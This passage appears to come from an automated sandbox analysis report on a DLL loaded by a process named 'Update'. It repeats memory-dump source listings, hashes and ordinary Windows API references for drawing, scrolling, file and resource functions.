                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: CreateFontH_prolog3_IndirectInfoParametersSystem
                                              • String ID: D}4l
                                              • API String ID: 3603398567-2520069617
                                              • Opcode ID: 79e9a47ed4ab80864789c778fd874a91f62e890240f5bfe2237f1c5c6b50c7e0
                                              • Instruction ID: 3e6d818b608d462d6aa387520c400ea32fd67dd42314d931b2bba65e59c3de36
                                              • Opcode Fuzzy Hash: 79e9a47ed4ab80864789c778fd874a91f62e890240f5bfe2237f1c5c6b50c7e0
                                              • Instruction Fuzzy Hash: 6A016DB1A01359AFDB40DFA8CC49BD9BBBCBB45304F1085AAA219DB641DB749A84CF50
                                              APIs
                                              • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,6C32CF2F,?,?,00000000,?,?,?,6C32CDED,00000002,FlsGetValue,6C36C584,6C36C58C), ref: 6C32CEA0
                                              • GetLastError.KERNEL32(?,6C32CF2F,?,?,00000000,?,?,?,6C32CDED,00000002,FlsGetValue,6C36C584,6C36C58C,?,?,6C32117D), ref: 6C32CEAA
                                              • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?), ref: 6C32CED2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: LibraryLoad$ErrorLast
                                              • String ID: api-ms-
                                              • API String ID: 3177248105-2084034818
                                              • Opcode ID: 711e20d89ec2b64841e92d4f2228b67709713442c0bb424fa0392880cc55ff37
                                              • Instruction ID: 79198bf8b5e43a5687bfa73c6b2f6e26538f7cb9127ce2f95d03106a07a8b0a0
                                              • Opcode Fuzzy Hash: 711e20d89ec2b64841e92d4f2228b67709713442c0bb424fa0392880cc55ff37
                                              • Instruction Fuzzy Hash: DCE04F703C5208BBFF002A61EC15B4A3F6CAB02B46F344020F90EA8890D766D9508E85
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Object$Delete$H_prolog3
                                              • String ID:
                                              • API String ID: 487261545-0
                                              • Opcode ID: ee539cf1d8d0e2843ad76f1b6e025fd0c35048bfafd99051e10fc17a9cfe0909
                                              • Instruction ID: 4efdb8dda392c2cbc96436cc2951e82703798a65e631b64371d29a040ef7ece6
                                              • Opcode Fuzzy Hash: ee539cf1d8d0e2843ad76f1b6e025fd0c35048bfafd99051e10fc17a9cfe0909
                                              • Instruction Fuzzy Hash: 0912F774D00719CFDB15CFA9C890B9EFBB5BF49314F10826AE84AA7650EB70A985CF50
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 6C216834
                                              • GetTextColor.GDI32(?), ref: 6C216941
                                                • Part of subcall function 6C1CC827: SelectObject.GDI32(?,00000000), ref: 6C1CC847
                                                • Part of subcall function 6C1CC827: SelectObject.GDI32(?,00000000), ref: 6C1CC85D
                                                • Part of subcall function 6C1CCDCC: MoveToEx.GDI32(?,?,?,?), ref: 6C1CCDED
                                                • Part of subcall function 6C1CCDCC: MoveToEx.GDI32(00000000,?,?,?), ref: 6C1CCE03
                                                • Part of subcall function 6C1CCE11: MoveToEx.GDI32(?,?,?,00000000), ref: 6C1CCE2C
                                                • Part of subcall function 6C1CCE11: LineTo.GDI32(?,?,?), ref: 6C1CCE3B
                                              • __EH_prolog3_GS.LIBCMT ref: 6C216B58
                                              • FillRect.USER32(?,?,?), ref: 6C216B9F
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Move$H_prolog3_ObjectSelect$ColorFillLineRectText
                                              • String ID:
                                              • API String ID: 3864112738-0
                                              • Opcode ID: 872b1aa5a551703933afb308ccd94fca8b58c0f10f5cda1decae3a2b75b7e85f
                                              • Instruction ID: 55c90cdc72cda88f4cd53f2478a9f5c0362981013f6a64f8e2abd270c723b008
                                              • Opcode Fuzzy Hash: 872b1aa5a551703933afb308ccd94fca8b58c0f10f5cda1decae3a2b75b7e85f
                                              • Instruction Fuzzy Hash: 5BD12375A002099FCF05DFA8C894AEEBBF6FF49314F144159E912A7B90CB35AD05CB61
                                              APIs
                                              • GetConsoleOutputCP.KERNEL32(8BAE044A,00000000,00000000,?), ref: 6C32AC47
                                                • Part of subcall function 6C322501: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6C325CE9,?,00000000,-00000008), ref: 6C322562
                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6C32AE99
                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6C32AEDF
                                              • GetLastError.KERNEL32 ref: 6C32AF82
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                              • String ID:
                                              • API String ID: 2112829910-0
                                              • Opcode ID: 8d7cb029e3686a48110e834b3a30fd59085bc0f47fa8b84dbbb67dfa7da7f47a
                                              • Instruction ID: 9681b5b95aff4075bf84292761798be3b60e06626ab5984073b3c57faca8ac56
                                              • Opcode Fuzzy Hash: 8d7cb029e3686a48110e834b3a30fd59085bc0f47fa8b84dbbb67dfa7da7f47a
                                              • Instruction Fuzzy Hash: 73D17BB1E05259AFCF11CFA8C890A9DBBB8FF09314F14416AE465EB741D739A942CF60
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 6C29EE1A
                                              • GetTextColor.GDI32(?), ref: 6C29EF27
                                                • Part of subcall function 6C1CC827: SelectObject.GDI32(?,00000000), ref: 6C1CC847
                                                • Part of subcall function 6C1CC827: SelectObject.GDI32(?,00000000), ref: 6C1CC85D
                                                • Part of subcall function 6C1CCDCC: MoveToEx.GDI32(?,?,?,?), ref: 6C1CCDED
                                                • Part of subcall function 6C1CCDCC: MoveToEx.GDI32(00000000,?,?,?), ref: 6C1CCE03
                                                • Part of subcall function 6C1CCE11: MoveToEx.GDI32(?,?,?,00000000), ref: 6C1CCE2C
                                                • Part of subcall function 6C1CCE11: LineTo.GDI32(?,?,?), ref: 6C1CCE3B
                                              • FillRect.USER32(?,?,-000000C8), ref: 6C29F13D
                                              • FillRect.USER32(?,00000000,?), ref: 6C29F161
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Move$FillObjectRectSelect$ColorH_prolog3_LineText
                                              • String ID:
                                              • API String ID: 971351308-0
                                              • Opcode ID: 62d347033e0cd5671d788e294faaa6e4dc84f9ad5ede1c5f905d47a677039d80
                                              • Instruction ID: 438963f2783e8f179fed6a019329310c7256c393321326023c149814f8318633
                                              • Opcode Fuzzy Hash: 62d347033e0cd5671d788e294faaa6e4dc84f9ad5ede1c5f905d47a677039d80
                                              • Instruction Fuzzy Hash: 3AC17935A002099FDF05DFA9C894AEEBBFABF49314F144159F816A7780CB35AD05CBA1
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Rect$Empty$StateWindow
                                              • String ID:
                                              • API String ID: 2684165152-0
                                              • Opcode ID: ec28d42be1476206e8d1fd5f83053412cd3e67512dfe23bbb1732bd0d8c98b6f
                                              • Instruction ID: 4a9812ab465bd12a2684834077573884b5d97c836161e4722bd99c11637d1d24
                                              • Opcode Fuzzy Hash: ec28d42be1476206e8d1fd5f83053412cd3e67512dfe23bbb1732bd0d8c98b6f
                                              • Instruction Fuzzy Hash: 8BA18F72A0121A9FDF05CFA4C854BEEBBB5FF89314F144059F816A7780DB36A841CBA4
                                              APIs
                                              • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 6C210C17
                                              • GetLastError.KERNEL32 ref: 6C210C25
                                              • GetLastError.KERNEL32 ref: 6C210C42
                                                • Part of subcall function 6C2116B5: __EH_prolog3_GS.LIBCMT ref: 6C2116BF
                                                • Part of subcall function 6C2116B5: GetFullPathNameW.KERNEL32(?,00000104,?,?,00000268,6C211531,?,?,00000000,?,6C243542,00000024,?,?,?), ref: 6C2116F2
                                              • CreateFileW.KERNEL32(?,80000000,?,0000000C,00000003,FFFF7FFF,00000000,?,00000000,?,?,?,?,00000104,00000000), ref: 6C210E3D
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: ErrorFileLast$CreateFullH_prolog3_NamePathPointer
                                              • String ID:
                                              • API String ID: 2834880015-0
                                              • Opcode ID: 38c7a7ff53350ad7c0028a552eb6b434ce809648204586eadc7e72353f91eaa4
                                              • Instruction ID: e8ed31e969d09f93e9fb1af55afbb52993fb50412aa8671957548f9b74f57456
                                              • Opcode Fuzzy Hash: 38c7a7ff53350ad7c0028a552eb6b434ce809648204586eadc7e72353f91eaa4
                                              • Instruction Fuzzy Hash: 41710571A1525DABDB148F24DC48BDE77F8EB49318F10866EFA18D7A40D774DA80CB90
                                              APIs
                                              • GetClientRect.USER32(?,?), ref: 6C2089BA
                                              • InflateRect.USER32(?,00000000,00000000), ref: 6C2089F0
                                              • GetSystemMetrics.USER32(00000002), ref: 6C208A77
                                                • Part of subcall function 6C1D4A38: SetScrollInfo.USER32(?,?,?,?), ref: 6C1D4A7C
                                              • EnableScrollBar.USER32(?,00000002,00000003), ref: 6C208B96
                                                • Part of subcall function 6C1E525D: EnableWindow.USER32(?,00000024), ref: 6C1E526E
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: EnableRectScroll$ClientInflateInfoMetricsSystemWindow
                                              • String ID:
                                              • API String ID: 3090651611-0
                                              • Opcode ID: 5931262934b01011a3d6c4c6063419c922eefd54b78f4a31f19e2b5e333c4dca
                                              • Instruction ID: 41409cd4e74e1b2ceda6051a4dd7bd0bac8d7f891aad300499e01ca9496cbd46
                                              • Opcode Fuzzy Hash: 5931262934b01011a3d6c4c6063419c922eefd54b78f4a31f19e2b5e333c4dca
                                              • Instruction Fuzzy Hash: 4C713971A00619DFDF00CFA8C985AEEBBB9FF49304F14016AED09EB645DB71AA45CB50
                                              APIs
                                                • Part of subcall function 6C1CD964: GetDlgCtrlID.USER32(?), ref: 6C1CD972
                                                • Part of subcall function 6C1CD964: IsChild.USER32(?,?), ref: 6C1CD980
                                              • GetScrollPos.USER32(?,00000002), ref: 6C1CE8F7
                                              • GetScrollPos.USER32(?,00000002), ref: 6C1CE923
                                              • SetScrollPos.USER32(?,00000002,00000000,00000000), ref: 6C1CE980
                                              • SetScrollPos.USER32(?,00000002,00000000,00000000), ref: 6C1CEA02
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Scroll$ChildCtrl
                                              • String ID:
                                              • API String ID: 656700424-0
                                              • Opcode ID: af04214659edd9e90506db3373660f3e2bf0668220e8d8f2e7e9ab303769fda9
                                              • Instruction ID: 19078c3b938eea8c6c07ab0e427e681a97f307f1bf1341583e7b909c94e33a99
                                              • Opcode Fuzzy Hash: af04214659edd9e90506db3373660f3e2bf0668220e8d8f2e7e9ab303769fda9
                                              • Instruction Fuzzy Hash: AA517B35B00229AFDF05DFA4C855BAEBBB5FF49311F10406AE916A7380CB74AE01CB91
                                              APIs
                                                • Part of subcall function 6C1CD964: GetDlgCtrlID.USER32(?), ref: 6C1CD972
                                                • Part of subcall function 6C1CD964: IsChild.USER32(?,?), ref: 6C1CD980
                                              • GetScrollPos.USER32(?,00000002), ref: 6C1CEAAD
                                              • GetScrollPos.USER32(?,00000002), ref: 6C1CEAD9
                                              • SetScrollPos.USER32(?,00000002,00000000,00000000), ref: 6C1CEB36
                                              • SetScrollPos.USER32(?,00000002,00000000,00000000), ref: 6C1CEBAB
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Scroll$ChildCtrl
                                              • String ID:
                                              • API String ID: 656700424-0
                                              • Opcode ID: 68eaa0a9d1aa0c0d6aeee197e11138965404f8f20d019747c7b7a9c4722860c4
                                              • Instruction ID: a3fd20291f11f28aaa8fbafd9b6e124fd516a32fbdceb64f3aca6892466be35c
                                              • Opcode Fuzzy Hash: 68eaa0a9d1aa0c0d6aeee197e11138965404f8f20d019747c7b7a9c4722860c4
                                              • Instruction Fuzzy Hash: 6E511735B00219AFDF05CFA4C845BAEBBB6BF99310F204059E916B7390C775AA119F91
                                              APIs
                                              • __EH_prolog3.LIBCMT ref: 6C2024B1
                                              • IsWindow.USER32(?), ref: 6C202559
                                              • GetParent.USER32(?), ref: 6C202579
                                              • GetParent.USER32(?), ref: 6C202595
                                                • Part of subcall function 6C24870A: __EH_prolog3_catch_GS.LIBCMT ref: 6C248711
                                                • Part of subcall function 6C24870A: CreateCompatibleDC.GDI32(00000000), ref: 6C248751
                                                • Part of subcall function 6C24870A: CreateCompatibleBitmap.GDI32(?,?,?), ref: 6C248773
                                                • Part of subcall function 6C24870A: FillRect.USER32(?,?,?), ref: 6C2487BD
                                                • Part of subcall function 6C24870A: OpenClipboard.USER32(?), ref: 6C2487ED
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: CompatibleCreateParent$BitmapClipboardFillH_prolog3H_prolog3_catch_OpenRectWindow
                                              • String ID:
                                              • API String ID: 837828968-0
                                              • Opcode ID: d3756321177e422b2da094f7daeff6c6e78904d083f0dac58450827575dc2e78
                                              • Instruction ID: 4f7ef65c3c587962fc0253d7f327ba08825c8cddec890ffbb7d3a601e1608a71
                                              • Opcode Fuzzy Hash: d3756321177e422b2da094f7daeff6c6e78904d083f0dac58450827575dc2e78
                                              • Instruction Fuzzy Hash: 2E31D8B2705A0A9BEB089BB4C968B9A76F8BF4530D750042FFD06D7E10DF70E8058B50
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: H_prolog3_
                                              • String ID:
                                              • API String ID: 2427045233-0
                                              • Opcode ID: af128a94dcfc004c6879f0ba4be45180ea2d388375fff70b0fd6e90a1486cfc1
                                              • Instruction ID: 8fca91b980688da80dd431301fc7db02ebe976d1a1d03e1127eb24178ec6cd14
                                              • Opcode Fuzzy Hash: af128a94dcfc004c6879f0ba4be45180ea2d388375fff70b0fd6e90a1486cfc1
                                              • Instruction Fuzzy Hash: B0318F71E0161A9BDF04EFE8C995AEEBB75BF55305F104019F815BB640DB349909CFA0
                                              APIs
                                              • FindResourceW.KERNEL32(?,-00000002,00000006,00000000,?,00000000,?,?,6C1C83E3,00000000,?,?,?), ref: 6C1C8438
                                              • LoadResource.KERNEL32(?,00000000,?,6C1C83E3,00000000,?,?,?), ref: 6C1C844C
                                              • LockResource.KERNEL32(00000000,?,6C1C83E3,00000000,?,?,?), ref: 6C1C845E
                                              • SizeofResource.KERNEL32(?,00000000,?,6C1C83E3,00000000,?,?,?), ref: 6C1C8470
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Resource$FindLoadLockSizeof
                                              • String ID:
                                              • API String ID: 3473537107-0
                                              • Opcode ID: 6795c779a47c16e04a359f0fa63b3035e4e2a8d7f9677ed1759f24623b6b70f9
                                              • Instruction ID: bb8fa8780d2b1048c85e3ef3225752263d1ebeec187d10681574f9dae84a9e9e
                                              • Opcode Fuzzy Hash: 6795c779a47c16e04a359f0fa63b3035e4e2a8d7f9677ed1759f24623b6b70f9
                                              • Instruction Fuzzy Hash: 0A21F3317022149BF7205B69CCC4B6B77ACEF66359B15412AFD11CB680EB6DD805C7A2
                                              APIs
                                              • FindResourceW.KERNEL32(?,-00000002,00000006,00000000,?,00000000,?,?,6C1C83E3,00000000,?,?,?), ref: 6C1C8438
                                              • LoadResource.KERNEL32(?,00000000,?,6C1C83E3,00000000,?,?,?), ref: 6C1C844C
                                              • LockResource.KERNEL32(00000000,?,6C1C83E3,00000000,?,?,?), ref: 6C1C845E
                                              • SizeofResource.KERNEL32(?,00000000,?,6C1C83E3,00000000,?,?,?), ref: 6C1C8470
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
